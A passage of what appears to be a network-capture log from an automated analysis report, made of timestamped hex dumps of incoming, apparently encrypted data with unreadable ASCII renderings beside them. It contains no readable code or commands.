                                                                                      2023-08-04 16:48:39 UTC954INData Raw: eb c6 da 1b 51 be c6 44 fb 95 35 57 82 9a 09 80 4f c4 ef 81 1e 76 c5 43 d4 cc ca 6f 65 01 3b 76 e0 e6 56 15 0f 04 a5 11 5f ff a1 5b 4d 8d 20 2b 81 ca 3b 1e 70 19 ad 18 ed 48 59 d3 75 96 04 f3 e6 8e ef ae 35 06 e4 6e a8 e1 0c 0f 82 38 2f c3 e2 6f 75 9a b4 ac 8e a6 b1 fb 9a 37 1c 24 84 f3 19 42 10 a6 9e 13 5f bd c0 69 b9 bb 5a 7c 1a 80 81 6f c0 0b 9b d8 90 49 a8 74 84 30 3a 60 15 70 a4 ae 66 2a f6 79 7a 4e f9 68 93 47 5a e6 05 16 10 ca 0b 53 55 c8 6b 30 ea c5 e5 ad b7 3c 81 5a 3c 46 98 ab a4 31 a3 8a ea 49 e5 40 22 be 4e ff 50 8c 86 74 c6 12 13 33 7c 87 66 4d d7 99 ba b5 a6 89 49 34 6d e5 33 f9 0f 38 d7 c1 6a a6 38 d1 2b 44 ac 01 f5 3d db df 32 ce 6a ee f2 9f 03 b0 67 56 ac 7a b2 d7 1a 98 06 a5 92 4e a5 1b bb 08 f3 ce 8f 3d 82 8a 61 eb be 5d 8b a9 a4 b0 f3
                                                                                      Data Ascii: QD5WOvCoe;vV_[M +;pHYu5n8/ou7$B_iZ|oIt0:`pf*yzNhGZSUk0<Z<F1I@"NPt3|fMI4m38j8+D=2jgVzN=a]
                                                                                      2023-08-04 16:48:39 UTC958INData Raw: 46 80 54 e2 f9 71 64 da 68 2e 10 b1 4c db ad 1a 99 58 c8 8d ab 80 91 8f 18 e4 46 4d 09 89 f4 9d 68 a8 99 d9 67 8b d5 7b f8 f8 71 bb 1f b5 98 64 f5 b7 08 8c d5 93 d8 f1 c7 d8 e5 df 9a de 72 18 9c aa dd 9f 4b e1 41 48 88 a8 1c 9e ea 23 d4 ea bf 66 9a 56 d0 f4 05 23 56 5f 9f 35 e5 35 9a 5f 40 f1 6f 21 07 24 60 c1 09 59 57 a5 3d 3c 89 8e 7d 33 a1 19 3f d1 7c 54 e1 48 16 fd 14 1c 53 e5 13 3c 5c 09 5b 70 a9 7f 93 d8 5c b5 6c 50 9f 31 a8 4a 06 94 9c 04 6d 68 9b 92 7e 7d e2 ad 66 63 8d c0 80 ae 2f f0 68 c3 6c 91 1a b8 c5 41 4b 74 79 a3 17 16 bf 36 f8 40 1a a2 d8 68 fc d8 43 6a 52 cf 9f 50 81 22 6a 4e 5e e6 53 ff ba 6b 39 f5 eb 11 62 60 3e e0 23 6a 5d 53 3e c1 88 a1 3d b9 ad fb 9d 45 3b de 95 05 92 58 ac aa 4a b5 1e 2d ae c7 fe 08 a3 0b 49 a9 df 7e 52 63 c2 71 fe
                                                                                      Data Ascii: FTqdh.LXFMhg{qdrKAH#fV#V_55_@o!$`YW=<}3?|THS<\[p\lP1Jmh~}fc/hlAKty6@hCjRP"jN^Sk9b`>#j]S>=E;XJ-I~Rcq
                                                                                      2023-08-04 16:48:39 UTC962INData Raw: 65 6d 4f af 82 0d 9e 2a 74 12 6f 72 1a 4d 60 c7 3d 68 eb e3 f2 9c 7e 07 2f b3 21 92 dd 20 bf ec 88 c3 1e ec 11 c7 e2 c3 18 f7 08 7a 86 96 72 f1 6e b6 1d 80 31 21 97 82 25 91 d6 13 16 5b 0b 83 a9 e7 16 0e 07 f9 d9 3c 63 f8 94 98 43 72 ee fc 6b 14 7a e9 8e 4d af 76 33 3e e6 0c 6a 43 de b3 ba f3 86 5c 23 53 fa 5d 2c b3 64 be d6 80 39 fc a3 4f 1a 6b bf 76 d0 f2 fd cd b7 7c 68 2c 21 a3 68 71 31 2f f0 85 cb 11 2b 1a e0 98 45 c1 fc 50 6e ff 95 b8 9e 3d 4d d2 f8 e9 ae 5c 15 32 f1 30 e3 1d 79 d8 73 15 b9 4e 30 dc 48 30 79 05 84 4e fd 5f 29 b5 5e c3 db bc be 49 47 15 fa 1f b8 87 cb 5d 3c 53 7a d1 a2 27 ed db e9 61 8f f5 e7 26 40 a0 57 71 e8 44 86 77 04 b4 ef ef 00 80 53 0f bc de a9 81 ec 58 95 c7 86 81 ce 50 07 0d f1 bd 04 bb 51 4b 62 a5 38 80 5b e4 84 4c 0b d4 9d
                                                                                      Data Ascii: emO*torM`=h~/! zrn1!%[<cCrkzMv3>jC\#S],d9Okv|h,!hq1/+EPn=M\20ysN0H0yN_)^IG]<Sz'a&@WqDwSXPQKb8[L
                                                                                      2023-08-04 16:48:39 UTC966INData Raw: 02 3f 31 b1 9f 61 0b cf 70 e5 e6 82 53 ba 5b 25 fd 54 ce d7 51 7f 1b fb 14 b6 15 bb dd 35 fc 90 59 cd 1b ca 33 24 d9 e9 c3 5a b0 b7 24 57 3e 9a e6 5b 10 e5 ca c6 ea 48 34 f9 c2 81 e1 61 a0 8d c3 ba e8 51 09 1a 65 dd a6 00 ec 71 e0 7e 9a 8c 11 82 0d 70 9c e4 48 47 0e c0 41 72 3e 69 48 12 e2 7e 7e 62 c5 96 7e be 84 16 75 f6 9d da 97 f8 44 39 af df 19 ce b2 a7 d7 f7 0d ed 2c b9 09 43 fc 3a 8c 04 0c 6e fd e9 0c 1f ed f7 ea 49 b1 c7 29 47 5e 34 1d 8f c7 05 fb c5 91 a3 f9 eb 89 f4 d5 79 e8 5d ce 27 f6 ec 4f f7 5e 28 0e 0b 34 dd 12 12 36 c6 6d 61 8f 76 7d fe ff f2 cd 1e d8 bc 57 db 46 97 e5 f9 8e c8 0c 72 4f 9d 15 e0 7a e6 c4 ea 1c af 2d 9a 56 67 b6 9b fb fa 54 3e d6 49 54 5e b0 97 48 47 19 1c 3e 92 7d 2d 1e 54 44 2b 1e bc c4 6a 5e 49 cc eb c6 c3 a8 49 82 f4 59
                                                                                      Data Ascii: ?1apS[%TQ5Y3$Z$W>[H4aQeq~pHGAr>iH~~b~uD9,C:nI)G^4y]'O^(46mav}WFrOz-VgT>IT^HG>}-TD+j^IIY
                                                                                      2023-08-04 16:48:39 UTC970INData Raw: c7 23 36 94 b0 3c 68 0f 77 21 df dc 97 f2 dd ee 95 4a ae 78 d0 9b 99 88 3d 1c 07 80 77 06 68 5e d8 e9 cb 61 46 89 3c 01 a5 62 8b cc ec ff 41 a2 84 4a 01 56 2a 31 9d 87 f5 38 94 e1 32 d1 50 f1 e4 6f 65 85 ad c4 26 62 fb 53 ed 72 64 45 d0 20 af 98 00 8f 70 94 af d1 04 75 fb 8a 1f de f1 c0 13 6c 0d cd 94 07 1d 53 a1 45 9f d4 7c 98 dd 7e 11 64 12 95 0b c6 ac 18 9a dd 55 b1 07 30 d3 f4 42 04 59 17 69 fd d4 30 30 9a 2d 9a 98 52 0e d3 ad e0 30 10 d5 e5 16 4b c5 99 fe 8e 70 86 8e 49 98 02 bb bf 35 65 48 a7 e9 aa 9e 0c 85 29 fc c3 85 de 5e dc b6 34 66 71 6b 9c ce f2 69 d1 2d 16 b3 7c 14 d8 5a 6f 29 aa e7 25 df 52 ac ec cb c4 06 b4 c1 3e b0 77 17 03 18 d5 1b a5 1b 7a ed b0 ab af db 1b 94 da c4 25 a1 aa 0b b5 c4 10 02 a8 b1 bb 30 12 5f 4e ec 36 e9 38 c5 64 78 54 9f
                                                                                      Data Ascii: #6<hw!Jx=wh^aF<bAJV*182Poe&bSrdE pulSE|~dU0BYi00-R0KpI5eH)^4fqki-|Zo)%R>wz%0_N68dxT
                                                                                      2023-08-04 16:48:39 UTC974INData Raw: dc ac 7b e0 b2 e0 89 52 99 69 79 e6 33 73 7a 36 e8 91 2b 50 7b fe a7 38 b8 d7 c2 7c 3f 1b 3e 24 67 fb e3 c3 8f 39 30 37 3c 6c 44 f9 c1 35 37 57 00 f4 4b 9a d3 49 ad 53 72 5c 45 0c f8 59 a4 41 fe 18 52 2c b5 1c 90 cd 13 10 13 af b7 f0 55 9e 06 c3 fb 66 b0 56 75 66 6e cf c4 26 d0 37 12 82 4d 66 bd 8d 88 4c ac 0a 85 49 d1 c9 cd 94 e8 de c7 68 08 c7 62 16 32 15 15 e5 b8 e9 96 6d 7c 21 4a 11 1c 5a 34 3d 8a 8f 74 3a ea c1 b3 79 54 f1 72 b1 7f 28 9f 1c bf cd d8 50 3b 29 6a 13 48 81 b3 b9 0f ee a8 64 ee cc 3a d9 58 71 d7 ba e2 cc a5 90 ab e4 10 85 b1 ed 32 8d 9b ec 36 c5 2b 96 15 3d 64 d2 bd c3 dd d2 fa de dc 22 2f a3 d7 fb ad f9 75 52 d6 54 00 f9 46 6a 5e 6b 7b 6c b9 fd 65 21 74 21 99 6e ca 9e 3b bc c9 cc 22 7f 95 82 62 7a bf bb 32 ef 17 32 c7 9f c4 15 dc a0 5f
                                                                                      Data Ascii: {Riy3sz6+P{8|?>$g907<lD57WKISr\EYAR,UfVufn&7MfLIhb2m|!JZ4=t:yTr(P;)jHd:Xq26+=d"/uRTFj^k{le!t!n;"bz22_
                                                                                      2023-08-04 16:48:39 UTC978INData Raw: 94 65 a0 ba 7d 35 33 cf 15 e3 53 4a 77 2a b8 79 b3 7d 97 9e 52 33 af 17 3c e3 fb 07 28 57 28 7d 1e 44 12 e4 05 b2 15 cb ae 34 db 48 78 ef 13 d9 57 98 01 eb c4 9d fb 72 22 15 ef 73 8e 92 8b fa d8 86 43 50 e2 dc 6a 99 f5 1b 92 16 35 0d e7 43 35 d1 29 4b 6a 9f a6 c2 26 78 db 62 c8 34 f0 40 d8 d3 26 81 69 b8 80 dd fb 85 0e 2a 6f 74 dc 88 07 aa 80 01 99 32 7a a1 69 f7 4b 21 54 56 b2 4b f1 78 a4 d7 81 ae bf 39 93 51 6f 0b 2e 2e bf 20 02 1b 7f 92 2f 10 8c 0a 3e a2 1c 82 13 22 50 57 ea e2 dd 93 d3 e3 51 7f 6d b5 72 06 7c 71 7a 11 0b 06 68 68 48 de b3 93 4d 53 e3 d8 ad 78 41 0b c4 3c af 7c ae 22 fc 7d 23 c8 5b 91 6d 30 70 12 80 0e 97 7a 2b f1 f4 51 a5 4a e8 5d 38 9a ca 90 e5 10 de 2e 46 9f b0 a0 6a 59 c7 85 6f 4b cd 6e f5 4f 80 24 aa 2d 74 d8 94 c4 85 97 95 ea 42
                                                                                      Data Ascii: e}53SJw*y}R3<(W(}D4HxWr"sCPj5C5)Kj&xb4@&i*ot2ziK!TVKx9Qo.. />"PWQmr|qzhhHMSxA<|"}#[m0pz+QJ]8.FjYoKnO$-tB
                                                                                      2023-08-04 16:48:39 UTC982INData Raw: a1 20 6a 37 b0 14 90 2e 8b 22 f8 99 03 2c 2f 86 38 2d f9 97 fa 6e cd d9 87 74 0c 32 00 84 56 fc 6a 95 4e 61 8a 1e b6 83 58 20 4a ba e9 b8 e4 52 56 f4 ed 98 00 36 24 5c 17 14 bc 21 41 8e a4 40 b6 d4 7a 7f 0b 18 06 40 94 91 c8 0f 71 e6 98 fb 13 ac 9b ff 51 59 ed 52 a5 62 db d2 54 7a c2 6d 9e 6d 9a 9b 88 1a 3b 82 07 d8 be 1b 81 5e c8 0a a8 57 21 b8 7f 26 9a f8 65 f8 ce 01 fe 0f 0a 64 3f ce 3c 1c 8d e9 6d 59 a6 8c a4 42 b1 a1 ce 34 61 ea 48 d0 c0 c4 8c ae 0d 9b 90 c4 a9 65 77 28 5d 49 16 2b d1 5d c1 29 c4 14 d5 34 55 e7 c6 a9 67 5b 27 fd 27 ac b2 ed 7b 9c 40 07 48 e8 9e 3f 7f 02 42 11 06 fe 1e ee 52 61 d3 b9 39 79 c8 76 9a 7f d7 1c a7 4e 64 99 79 d9 dc f3 db f5 3d 5a 74 a9 07 6f a4 43 c4 e6 31 12 96 e7 9c c7 29 16 9a 4d 8c f1 0d e2 c8 c7 8f 22 ba 7c 37 de 2f
                                                                                      Data Ascii: j7.",/8-nt2VjNaX JRV6$\!A@z@qQYRbTzmm;^W!&ed?<mYB4aHew(]I+])4Ug[''{@H?BRa9yvNdy=ZtoC1)M"|7/
                                                                                      2023-08-04 16:48:39 UTC986INData Raw: d4 bf af 67 b1 1e 39 85 18 7c 70 7e e6 fb a9 d8 49 48 b5 e2 56 7f 45 60 73 c8 87 5e 98 a9 6b d7 77 b2 cd 65 75 ca 00 65 d5 99 23 69 05 1d 4a cb d2 8d 3d a4 ae b7 1c 5c 69 52 67 a8 dc 7f ec 35 be 27 8f 27 80 d6 11 b9 ce b2 cc 51 cf 40 0b 1b c2 c9 fe 94 4a 15 ae f4 5e 0b 73 e9 6b 25 13 0c f9 31 67 21 ad 12 80 25 4a d5 c7 86 19 b1 a2 74 2d f2 5e ca 53 30 77 14 b9 b9 69 04 45 d1 2e 0f 58 bf bc c8 b6 14 cc 0d c2 c8 3f 27 5a e9 62 e6 ba b1 41 bd 8b 9c 2d 6c 51 9a 03 d7 3b 6d 9d e1 12 28 d8 08 19 51 90 82 de 6a 91 b6 59 b1 ca dc 36 cb 0f b3 8e 00 0d 8f 92 7f 01 90 88 d4 8f d5 ea 3f e3 70 99 dd 91 e2 3a 3b 0e 2a 88 57 10 29 ed 28 db e3 99 a5 d5 17 b3 48 57 9a ee b7 92 3c 6b 96 9d 7e b7 65 9b 71 11 97 43 a8 c2 77 93 e6 f7 25 9e 19 e0 c6 ca 7d 5c 82 f1 a9 3d 40 e9
                                                                                      Data Ascii: g9|p~IHVE`s^kweue#iJ=\iRg5''Q@J^sk%1g!%Jt-^S0wiE.X?'ZbA-lQ;m(QjY6?p:;*W)(HW<k~eqCw%}\=@
                                                                                      2023-08-04 16:48:39 UTC990INData Raw: 85 17 45 f1 b0 74 01 8c 2d 41 a9 38 df 50 4d c8 98 97 56 27 53 6d 32 9c 49 0b c6 07 7b 27 bd 54 d9 3a e3 5d 4b 55 67 09 f6 ef 06 02 65 6e 21 42 bf ab ce 48 96 1b 70 3d 75 06 24 36 52 1d 57 28 81 17 a3 3b 3d 0f 73 52 0b 58 92 86 ac f0 e1 cb 00 2c 66 d6 1b 16 ba 77 6f f3 79 07 82 9a ea 0f c6 42 52 a3 20 dc c8 9d 2d 99 04 37 0f 69 99 87 c5 e1 f2 9a 40 28 44 ff 95 39 dc 85 8c 94 02 6c 7d c4 ee 2f 39 de 95 60 85 83 eb 16 e2 11 9a 64 a7 4c 7d ec ea 46 b9 0a fa 46 82 07 55 db fe 4b a3 b0 40 89 e8 ca 3c ff 2c 60 3c 15 e6 c3 fe 6a b4 6f 3d ee ae 28 de 90 6f 69 13 64 52 71 54 cc 33 cf fb b7 37 50 13 07 0b bd 9f 85 44 ce b0 71 74 e3 e6 41 82 9f 3c ed 35 2c 39 0b 76 3c 23 e2 1d ce 1e 75 b8 e5 e5 8c 74 1e de 4b 7c 2b 0c 66 06 b4 be 21 a9 8c 02 3e ff 1f 04 9e d7 ac 33
                                                                                      Data Ascii: Et-A8PMV'Sm2I{'T:]KUgen!BHp=u$6RW(;=sRX,fwoyBR -7i@(D9l}/9`dL}FFUK@<,`<jo=(oidRqT37PDqtA<5,9v<#utK|+f!>3
                                                                                      2023-08-04 16:48:39 UTC994INData Raw: 9d 9a 03 ac e7 1d 3b bc f2 4f e0 bd 54 ed 12 2d 06 2b f5 1a 0e 7e 7b d5 14 02 c0 74 07 61 ca c4 47 70 81 6b 43 81 5b c3 98 c9 62 34 7f b6 a6 71 04 3f 76 e7 ca 03 21 27 0e f6 5d 65 de fb 89 1a 50 f7 f9 c1 1d 26 9d 77 99 36 cf 49 78 e6 6f 81 63 b5 19 10 2c 07 0d d9 e6 c0 39 26 1b b1 17 6b 1c 3f 7a fa 8d 25 36 23 ba 9e de e4 06 ca 92 a3 c6 8e 79 b8 d8 6b ce b3 99 cb 0a d0 4c 49 8a 90 26 9c a8 de 88 54 ad f7 cf ae 76 de 4d d6 cb 78 37 00 23 68 1c 4f f7 18 55 80 eb 76 72 af 23 86 e4 79 c5 91 a9 47 7e 43 6f d9 58 89 b7 37 9f 39 8c 33 c2 bf ce 28 03 e4 43 1d 6d f4 f3 07 98 e1 0b ab 38 b9 8f d7 70 65 a5 51 39 a9 05 f1 27 93 f9 79 7e 3f 38 85 68 5f 93 69 e9 cb ac 12 92 75 25 dd b3 17 f6 f4 cf e4 2b d7 80 84 51 6b a8 16 56 6f 81 10 ca 31 32 b9 8a 18 7b ad 95 cb ac
                                                                                      Data Ascii: ;OT-+~{taGpkC[b4q?v!']eP&w6Ixoc,9&k?z%6#ykLI&TvMx7#hOUvr#yG~CoX793(Cm8peQ9'y~?8h_iu%+QkVo12{
                                                                                      2023-08-04 16:48:39 UTC998INData Raw: 7e 71 c0 c7 44 21 bc 44 df 85 9d 5d b6 79 6e d0 12 16 50 40 b1 72 b1 a2 25 90 65 54 b0 20 40 bf 7b 90 0b 30 be b0 2a 91 0b bc 2e 72 db b0 16 e6 e8 3a 46 e2 e8 b5 05 d4 27 37 b0 ba 89 7d 0e 68 58 ca 36 1d a4 9c 10 f5 d7 a2 6d c6 f3 27 52 a3 33 6b 1a 24 20 f1 ef 5b 7f 88 0c 1c 76 9a da ba 45 da d3 b7 04 20 f1 33 20 b9 63 0e 8d bd 49 8d 0b b1 03 95 5a 6a 4d b3 e0 5c 86 52 8b ec c8 f2 79 66 08 f4 2d 01 d8 ce 6d 93 2b cf 4b 88 42 03 fa 51 f6 89 79 14 52 21 92 eb 23 7e 1f e5 a8 e6 a6 50 81 5f 2e bf 21 51 a4 85 7b 2a 7f 83 d6 0b 09 4e b6 ba 32 f0 86 ce 69 f7 9d be 81 db e1 93 f5 e4 2e f7 f5 e8 70 cd 19 72 9d 92 1e 9d 29 09 c6 4d 42 62 ab 54 09 87 f1 1c ba 0f 60 b8 79 ac da c8 25 b6 17 04 55 94 53 06 d7 c6 d3 70 3f 14 3c 7b 0d 2b ea ea 38 d3 8e 2d a0 ca dd c8 0d
                                                                                      Data Ascii: ~qD!D]ynP@r%eT @{0*.r:F'7}hX6m'R3k$ [vE 3 cIZjM\Ryf-m+KBQyR!#~P_.!Q{*N2i.pr)MBbT`y%USp?<{+8-
                                                                                      2023-08-04 16:48:39 UTC1002INData Raw: c4 23 ae 70 90 7e 70 33 9b 18 1a 9f a4 84 a7 8b e7 c6 e0 42 17 b5 c9 68 6e e1 06 ac 62 2e fa 13 64 5e e6 04 f1 ef 0e 6f 56 9d e5 b6 55 6d 39 c2 18 81 4b 87 3f d6 03 6c bc 91 5d dc b9 fe 1b ef 5c 38 e2 72 bf c3 d9 fc 1f fc e5 ae 70 70 a3 5a 90 56 76 ed 5b 30 05 3e 8c 4e e8 4c 48 f2 1e 37 b5 cd 91 24 0f 9a 3f 1d 8c 67 71 2a 96 4b 97 b2 4a eb 58 e0 9e 9f b4 01 1b 02 a7 9b fa 46 95 7b 31 2f cb f0 17 42 93 ca bd 55 d2 39 c3 1c 98 fe 65 c8 11 2c 80 b4 f7 04 1c 86 b4 21 a0 89 52 1d 7f bc 3d 38 8d 03 22 ca a4 75 2f 10 21 08 35 f9 b4 cc f2 5a 4c 4d 09 7a 6d 39 19 87 16 7d 3a eb 9b ac b6 b8 e0 e4 e6 81 91 30 d7 72 34 58 32 00 ec f8 49 91 f7 18 5f 2c a1 c4 ca bf 5f b9 1c d3 4c 28 fe d7 58 27 6a 8b 90 1e ea 8d d3 df 9e 85 18 af 63 88 8d 03 10 3a 3e 1f e4 fc 73 3f d3
                                                                                      Data Ascii: #p~p3Bhnb.d^oVUm9K?l]\8rppZVv[0>NLH7$?gq*KJXF{1/BU9e,!R=8"u/!5ZLMzm9}:0r4X2I_,_L(X'jc:>s?
                                                                                      2023-08-04 16:48:39 UTC1006INData Raw: 67 12 11 66 d5 de d1 f2 f7 c5 e9 d2 ea a7 10 3c 94 6a 62 88 0e 93 8b cb 15 d9 0f 50 72 bb cc 47 e5 5a fa 5e bd 66 55 5b 44 ea c4 eb 0c 08 0b 75 22 eb 9c f7 a7 91 e1 03 90 c3 f0 1f 90 9c 92 fa ac e8 bb 0f bd 13 f2 bc e2 b4 8e 0e ae aa 71 24 01 b0 3f 93 0f 99 8a ed 2d 59 6a fc df 53 ed 03 0a a2 1a 83 da 5f 3b d6 27 16 3c 58 d9 3f 87 60 ad c6 3d 6e 76 64 bb a1 24 51 5f aa 88 61 2b 48 33 04 b0 b6 34 ba 3e ca 21 13 78 5b 3f 21 90 c5 26 57 e6 7d b6 f0 45 80 07 79 75 89 b6 be f5 a4 f7 8d 90 38 1b 1d d4 44 7c bc b1 76 11 2b 2b ab ce a4 dc ff 9a 10 ff d5 4d 5e 9c 72 4a bf b1 ef 1a a9 ee 76 91 52 a3 9d 58 70 99 88 33 01 dc 9c 1f 11 8d dd 3b a1 4b db c9 a1 3e df 71 58 5d e4 9d 74 d0 41 b6 9a a1 09 8b 51 28 3e 3a 35 e1 5c 45 c7 7e a6 9d 57 c2 b2 6a 10 e0 3e b6 60 d6
                                                                                      Data Ascii: gf<jbPrGZ^fU[Du"q$?-YjS_;'<X?`=nvd$Q_a+H34>!x[?!&W}Eyu8D|v++M^rJvRXp3;K>qX]tAQ(>:5\E~Wj>`
                                                                                      2023-08-04 16:48:39 UTC1010INData Raw: 25 c9 3c 2d 80 c4 1b a8 c9 5a 5d 66 23 ac 38 43 a6 28 6b c6 7f be 6b 67 89 42 4e 7d fb bb 41 fe 04 23 00 c2 75 75 6d bb 9e c5 55 10 fb 59 66 8f ec fa e4 46 a4 f4 e7 fa 81 f0 a8 44 fa c2 6a 6d 01 84 a1 70 53 bf 14 36 b6 06 14 86 f0 b8 f3 43 79 25 14 dd 26 e6 ef e2 53 2b e3 4f 38 f7 fe ed bc cc 97 56 13 3e b2 66 08 8c 38 54 0d e9 ec 76 e0 8b b2 d5 93 91 b1 f8 0f a6 51 20 c0 f4 d8 7e 6a 7c f9 ca 22 34 7d bb 0f d5 1f fe db 6f a2 51 48 a5 10 19 21 06 5f b4 8b 0e 7e 9a a8 8c e0 ba a8 ac 78 06 9c 71 ee 58 0c 13 a1 29 ad bd b9 b7 62 d8 8b 3e 17 16 83 d3 90 d9 5f 31 83 7f c7 c0 67 1b 73 f1 8b 99 12 ae 51 8b 11 67 2e 03 ce 44 dc ab b8 cd 72 e7 3e 04 11 52 f8 c3 c0 75 e8 f4 0f 2a d4 1e 1e 4b a6 67 f0 5f 56 7c 4a 27 00 29 34 b8 dc b0 5c 67 d8 f5 bb 51 28 45 8b 8a 20
                                                                                      Data Ascii: %<-Z]f#8C(kkgBN}A#uumUYfFDjmpS6Cy%&S+O8V>f8TvQ ~j|"4}oQH!_~xqX)b>_1gsQg.Dr>Ru*Kg_V|J')4\gQ(E
                                                                                      2023-08-04 16:48:39 UTC1014INData Raw: 2e ca 7e cf ad 08 5b 7b 1e 5b ae 90 7e ea 24 c0 80 dc 06 be 89 ce 0b e7 f3 e8 16 cb fc 3a c5 e7 1a 70 e0 29 aa a2 4f f6 3a 2c 7f a0 1f ed 16 77 1a 8e 57 94 67 2b 4e 88 22 ee 39 50 70 e5 95 29 fa 9d db c8 a7 3d 94 31 4d a5 d7 2d 39 5a 87 dd 42 c6 cc 3d 7a f8 d4 7b b6 e3 ae 40 e2 62 b7 52 59 d9 52 60 d2 f3 4c c4 c6 58 0d 59 6a f8 6f 5a 17 fb f0 f6 42 32 91 e4 50 ae 3b 82 35 58 78 96 17 5e 47 23 c8 15 f9 80 95 0d c3 fb b2 0c 89 ac a3 21 34 e8 d7 e3 f8 f0 0e a2 a9 e3 6c da 5c af 0b 1f e4 1f 79 f7 ae 11 e6 01 79 a6 52 b6 c5 9d 99 5e a9 8c 45 14 a1 06 f2 8b 1d ab 21 b6 bf 3a fa 6c 4f e2 db 0f 49 a1 a4 cf bd f8 46 b5 ca 40 b5 12 97 34 0f c1 7a 45 62 81 a3 4e bd 27 39 76 91 98 51 5f 74 3b 46 e4 ba cf 6f 21 65 b7 a5 02 2a 94 a8 00 00 26 cb 5b eb 47 0e 0e 63 5e 7b
                                                                                      Data Ascii: .~[{[~$:p)O:,wWg+N"9Pp)=1M-9ZB=z{@bRYR`LXYjoZB2P;5Xx^G#!4l\yyR^E!:lOIF@4zEbN'9vQ_t;Fo!e*&[Gc^{
                                                                                      2023-08-04 16:48:39 UTC1018INData Raw: 26 89 88 58 f1 0c e6 df 98 05 95 96 f7 41 2e ab b4 b6 31 ce 77 54 e4 90 81 16 c6 01 de 80 53 3a fe dc c9 34 bf e0 83 54 55 38 52 34 7e a8 a6 70 2c cd 4a fd 4c f1 c7 52 23 e7 a6 ef 38 22 fd 73 e4 39 d4 05 c6 56 c9 ce de 09 1b cc 0d 32 97 54 20 cc b8 59 07 dd 30 5b 72 e9 b8 62 45 67 c0 16 d9 66 2c 5f 08 46 a9 1d 39 7e c8 5d 5d 83 f9 0c 9e 8f 20 79 b0 59 ef 0b 93 47 47 da bc 62 55 f1 19 4f 73 d4 f0 25 45 2c 1e 86 3a 87 e8 6d bc 2f f1 df 70 63 58 f1 c9 a4 2b a3 4c 12 58 ad 24 e8 3e 52 00 b8 fe 49 bf aa 84 d8 28 65 c0 43 21 25 cd b6 db d2 19 2a e6 2c bb b3 4e 0d 29 1e 6e 1f 3f 3e a5 de 61 ae 8f 6b 99 27 df 0f 24 32 27 70 5f 0f 32 d5 5f df e9 51 13 77 32 87 d0 73 d9 9d 7c 5a ac 19 3b 79 fe 3d f0 c6 e1 4e 7e 21 0a 19 e2 20 fe b5 0c 8a bd 02 d8 14 fb 69 4e b9 6f
                                                                                      Data Ascii: &XA.1wTS:4TU8R4~p,JLR#8"s9V2T Y0[rbEgf,_F9~]] yYGGbUOs%E,:m/pcX+LX$>RI(eC!%*,N)n?>ak'$2'p_2_Qw2s|Z;y=N~! iNo
                                                                                      2023-08-04 16:48:39 UTC1022INData Raw: f8 68 2c e5 8c aa e0 7b 75 fb fd b2 8e e2 90 19 e7 6d 04 28 b3 68 9c 75 0c 07 64 c3 2d 2c 18 a6 80 27 55 a0 73 14 63 41 2c 20 1b 25 3f f7 4b 33 34 14 1c f9 f5 0e 5f fc a8 af 8c 6d 8c 1c 35 60 04 48 ca a0 32 8d 6f 02 34 23 e5 d6 05 db e9 b4 19 4e 2b 0e a1 c4 9d bb a4 d6 a0 8c 55 c4 f9 b1 f4 04 6a 20 52 40 1c a5 ad 58 86 dd 45 57 02 d8 b6 3f 2d 54 63 b0 b0 3e 27 f7 8f e6 fb 4b 53 81 41 df 04 d5 db 56 91 c6 ae 33 44 3a 65 f3 c5 61 67 4b 39 8d 9e 04 81 b5 b2 e2 70 33 67 fd 15 13 de 7e d5 eb 11 f1 ac 87 ad e9 10 85 40 4b 25 fb 5d 35 af d5 24 9c bb 7a ad 5a 06 87 d3 d7 3b d9 e7 ea 9f 44 89 74 f7 e0 1d cc e4 a1 61 af d5 3a 31 37 72 39 1b 66 41 d5 dd d2 83 b0 16 d8 0a 9f be 1a 12 b6 14 87 e1 c4 5d ab a8 b0 50 86 34 59 bc 2b c2 49 04 4d a8 9e a9 a7 7d fa ca 0f 31
                                                                                      Data Ascii: h,{um(hud-,'UscA, %?K34_m5`H2o4#N+Uj R@XEW?-Tc>'KSAV3D:eagK9p3g~@K%]5$zZ;Dta:17r9fA]P4Y+IM}1
                                                                                      2023-08-04 16:48:39 UTC1026INData Raw: 79 04 65 90 ae 6d bd 13 30 27 1d 96 5f 59 f4 45 d7 38 61 6e 36 9d 57 d1 75 fa 51 f1 3b ef cd 5b 6f e9 ab a9 1a f0 66 3b b8 71 eb 64 46 7f fc 09 bf 58 1d 99 16 02 47 a2 48 67 88 c8 a3 a5 74 e0 34 c1 b0 d8 43 c5 06 0c c9 43 49 06 e4 8d 63 5f c6 b4 d9 cd c7 f5 0f 04 72 9e d9 c2 2e 18 cb df d3 7f fe a8 e5 e6 3f bb 76 7a 6a 7f 19 c0 43 e4 00 12 e9 bb 15 a5 0d 50 a1 3c b7 94 bd 66 ad c9 5d bd e0 ad 4f 52 a5 32 49 76 d7 d1 89 37 1e 38 62 6f f6 59 25 fd 52 9a 49 b8 50 fb 8d 87 15 44 9f d3 5c d9 f1 cb 1f ef 9c e0 f7 30 d6 cd b9 eb 06 bb 12 93 a4 da 6d 5f bd d2 a0 36 6b 0a f6 e9 ba ed 31 c5 d2 da 08 8c 1a 96 81 f2 f2 f9 76 11 8c 2c a4 17 e2 11 83 7e 07 cb 5c 87 89 a8 ac 13 74 d7 7f c3 25 0c 59 01 e7 04 05 d1 26 53 00 7a 92 91 be 88 59 72 94 e8 55 fa c0 19 cb 61 3b
                                                                                      Data Ascii: yem0'_YE8an6WuQ;[of;qdFXGHgt4CCIc_r.?vzjCP<f]OR2Iv78boY%RIPD\0m_6k1v,~\t%Y&SzYrUa;
                                                                                      2023-08-04 16:48:39 UTC1030INData Raw: d9 50 ae 57 ab 0d 97 aa 70 f4 d6 c5 ff a2 f3 38 dc 34 be 8d 44 74 0f 2f f1 31 7b e9 16 3d f5 27 e9 c4 bd 20 ae d9 aa de 3f ea c8 47 29 26 e9 35 dc cb 06 3b 66 e9 28 26 1a b0 69 fd 7c 68 1a a0 64 f8 5e ea 1f a2 1b ce fd 28 a5 1a 11 26 9a 1b 5a fd f1 27 a8 0c 66 25 05 d3 71 7e b5 de d8 84 f6 09 d9 95 fa 0a ee da ea a9 00 e2 dc 76 58 a3 f0 11 05 cf f2 c5 2d cd 97 36 57 0e cd 2d 24 95 98 77 cb 96 73 da a0 8a 23 70 41 61 ce e6 dd 09 83 d6 ff 42 56 3e 48 90 3f c5 69 e7 37 f7 34 3e 61 21 48 1e 50 3c 50 43 b5 8d 21 66 5a ac 9c 53 45 13 8b b6 9f f9 1f 49 13 c5 52 9e 62 ca f8 cb 27 03 7c 48 48 64 b4 72 70 7b a4 05 2a 30 a9 22 58 d8 05 73 f2 68 d1 81 